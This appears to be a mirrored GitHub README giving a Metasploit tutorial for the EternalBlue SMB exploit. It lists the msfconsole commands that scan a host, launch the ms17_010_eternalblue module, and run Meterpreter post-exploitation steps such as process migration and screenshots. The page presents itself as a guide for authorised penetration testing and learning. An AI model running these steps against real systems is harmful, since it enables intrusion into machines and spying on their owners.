Git Product home page Git Product logo

anamolz / exploitation Goto Github PK

View Code? Open in Web Editor NEW
3.0 1.0 0.0 3 KB

The Metasploit Exploitation - EternalBlue SMB Exploit module within the Metasploit framework enables security professionals and researchers to test the vulnerability and assess its impact on target systems. This module can also be used to develop custom payloads and exploit techniques for further research and analysis.

exploitation's Introduction

Metasploit Exploitation - EternalBlue SMB Exploit

This documentation provides a step-by-step guide on how to use Metasploit to exploit the EternalBlue vulnerability in a target system for educational and ethical purposes only.

Prerequisites

Before proceeding, ensure that you have the following prerequisites:

  • A Kali Linux machine with Metasploit Framework installed.
  • Permission to test on a network and system you own or have explicit permission to access.

Usage

EternalBlue Module

msf6 > search eternal

SMB MS17-010 Scanner

msf6 > use auxiliary/scanner/smb/smb_ms17_010

Target Host

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100

EternalBlue Exploit Module

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

Target Host and Local Host

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.69

Exploit the Vulnerability

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Post-Exploitation with Meterpreter - System Information

After successfully exploiting a target system using Metasploit's Meterpreter, it's essential to gather system information to better understand the compromised host. The sysinfo command is a useful tool for retrieving key information about the target system.

Using the sysinfo Command

To retrieve system information, follow these steps:

  1. Access a Meterpreter session on the compromised host. You should already have an active Meterpreter session. If not, establish one by using the appropriate Metasploit exploit.

  2. Once you have an active Meterpreter session, you can execute the sysinfo command:

meterpreter > sysinfo
meterpreter > ps
meterpreter > migrate 4536
meterpreter > screenshot

Disclaimer

This documentation and the provided commands are intended for educational and ethical purposes only. Unauthorized use of these techniques may be illegal. Ensure you have the appropriate permissions and follow ethical standards when using these tools.

Authors

License

This project is licensed under the MIT License. MIT

exploitation's People

Contributors

anamolz avatar

Stargazers

 avatar  avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.